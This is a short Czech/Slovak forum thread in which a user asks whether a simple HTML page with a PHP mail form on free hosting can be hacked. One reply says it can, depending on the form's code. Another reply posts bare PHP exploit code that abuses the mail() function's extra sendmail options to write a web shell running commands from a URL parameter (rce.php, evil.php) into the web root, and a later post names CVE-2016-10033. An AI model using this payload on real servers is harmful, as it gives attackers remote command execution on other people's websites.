bezpecnost HTML stranky, otazka
HackForum
| bezpecnost HTML stranky, otazka | # |
| Ahoj, mam otazku, dajme tomu ze mam naprogramovanu HTML stranku, na stranke nemam naprogramovany ziadny LOG-IN ani nic podobne, ide len o cisto HTML subor ktory ma akurat tak PHP formular cez ktory ide odoslat mail ... taku to stranku teda umiestnim napr. na Webzdarma... a konecnce k mojej otazke, da sa taka to stranka hacknut ? podla mojho presvedcenia nie :D ale tak to si myslim ja :D ... cize ak by som mal teoreticky pravdu a samotna ta stranka sa nedala hacnut, tak ten kdo by ju chcel hacknut musel by sa dostat na ten samotny web Webzdarma a vytiahnut z nej LOGIN ? ... alebo ako to teda je... Dakujem za odpovede
(odpovědět) | Eazy |  | 2.11.2016 1:13 |
|
|
|
| re: bezpecnost HTML stranky, otazka | # |
| 1) Webzdarma rozhodně není nejbezpečnější webhosting.
2) Záleží, jak ten jediný formulář napíšeš. I v tak jednoduchém kódu se dá nasekat spousty chyb.
Odpověď tedy: Ano, dalo by se to teoreticky hacknout.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět) | |
|
|
| re: bezpecnost HTML stranky, otazka | # |
| $to = 'a@b.c'; $subject = '<?php system($_GET["cmd"]); ?>'; $message = ''; $headers = ''; $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php'; mail($to, $subject, $message, $headers, $options);
$subject = ''; $message = ''; $headers = ''; $options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php'; mail($to, $subject, $message, $headers, $options);
(odpovědět) | | Pa1acinka | 77.247.181.* | 2.11.2016 23:08 |
|
|
|
| re: bezpecnost HTML stranky, otazka | # |
| hmm tak CVE-2016-10033 uz neni 0day :D
(odpovědět) | | Pa1acinka | 94.142.242.* | 27.12.2016 19:46 |
|
|
|
